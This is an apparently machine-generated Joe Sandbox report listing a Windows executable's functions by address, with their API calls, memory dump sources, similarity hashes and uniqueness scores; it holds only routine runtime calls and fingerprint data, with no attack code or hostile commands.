                                                                          Function 0040760C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,02088000,00409F6B,00000000), ref: 00407613
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                          • Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
                                                                          • Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
                                                                          • Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                          • Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
                                                                          • Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
                                                                          • Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406F77 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                          • Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
                                                                          • Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
                                                                          • Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrev
                                                                          • String ID:
                                                                          • API String ID: 122130370-0
                                                                          • Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                          • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                          • Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407DFC Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                          • Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
                                                                          • Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
                                                                          • Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004074A8 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                          • Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
                                                                          • Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
                                                                          • Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407DA4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                          • Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
                                                                          • Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
                                                                          • Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0040936C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                          • Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
                                                                          • Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
                                                                          • Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409AD0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
                                                                          • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                          • Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
                                                                          • Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
                                                                          • Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004051A8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                          • Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
                                                                          • Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
                                                                          • Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                          • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                          • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405C44 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                          • Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
                                                                          • Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
                                                                          • Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00408330 Relevance: .5, Instructions: 545COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 956cfbd081f07b2254a6d3089f19d76ceb57970edf417c817245e325156cd300
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: 4432E875E04219DFCB14CF99CA80AADB7B2BF88314F24816AD845B7385DB34AE42CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406F84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                          • Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
                                                                          • Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                          • Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405314 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
                                                                            • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                          • Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
                                                                          • Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                          • Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(004DFC60,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,004DFC60,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(004DED10,?,00000000,00008000,004DFC60,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
